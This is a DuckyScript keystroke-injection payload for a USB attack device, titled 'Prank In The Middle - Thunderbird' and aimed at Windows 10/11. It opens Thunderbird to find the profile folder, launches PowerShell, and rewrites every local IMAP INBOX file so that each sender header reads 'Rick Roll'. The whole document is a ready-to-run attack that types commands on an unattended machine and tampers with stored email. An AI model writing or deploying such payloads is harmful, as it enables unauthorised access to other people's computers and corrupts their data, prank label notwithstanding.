REM #####################################################
REM #                                     		        #
REM # Title       : Prank In The Middle - Thunderbird   #
REM # Author      : Aleff                 		        #
REM # Version	  : 1.0                   		        #
REM # Category	  : Prank                 		        #
REM # Target	  : Windows 10/11         		        #
REM #                                     		        #
REM #####################################################

EXTENSION DETECT_READY
    REM VERSION 1.1
    REM AUTHOR: Korben

    REM_BLOCK DOCUMENTATION
        USAGE:
            Extension runs inline (here)
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
            boot delay

        TARGETS:
            Any system that reflects CAPSLOCK will detect minimum required delay
            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
    END_REM

    REM CONFIGURATION:
    DEFINE #RESPONSE_DELAY 25
    DEFINE #ITERATION_LIMIT 120

    VAR $C = 0
    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
        CAPSLOCK
        DELAY #RESPONSE_DELAY
        $C = ($C + 1)
    END_WHILE
    CAPSLOCK
END_EXTENSION

REM Open Thunderbird and goto settings
GUI r
STRING thunderbird
ENTER
DELAY 1000
REPEAT 4 TAB
ENTER
DELAY 500
REPEAT 2 UPARROW
ENTER
DELAY 500
REPEAT 3 UPARROW
ENTER
DELAY 500

REM Goto profile directory
REPEAT 11 TAB
ENTER
DELAY 500

REM Copy the directory path
REPEAT 4 TAB
DELAY 500
SPACE
DELAY 500
ENTER
DELAY 500
CTRL c
DELAY 500
ALT F4
DELAY 500

REM Open the powershell and goto the directory
GUI r
STRING powershell
ENTER
DELAY 1500
STRING cd 
DELAY 500
CTRL v
DELAY 500
ENTER
DELAY 500

REM Get the INBOX content and edit it overwriting. Then close the powershell
STRINGLN_POWERSHELL
    cd ImapMail
    $directories = Get-ChildItem -Directory | Select-Object FullName
    foreach ($dir in $directories) {
        # Replace backslashes with slash
        $newPath = $dir.FullName -replace '\\', '/'
        
        # Add the sub-string '/INBOX' to the end
        $newPath += "/INBOX"
        
        # Check whether the INBOX file exists
        if (Test-Path $newPath) {
            # Check whether the INBOX file exists
            $emails = Get-Content -Path $newPath -Raw

            # Replace email sender with Rick Roll!
            # The following operation is simplified and assumes that the sender starts with 'From: ...'
            # and does not contain complex MIME structures
            $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll <Rick.Roll@tinyurl.com/prinkrollme>"

            # Write the modified content into the INBOX file.
            Set-Content -Path $newPath -Value $modifiedEmails -Force
        }
    }
END_STRINGLN
DELAY 1000
ALT F4
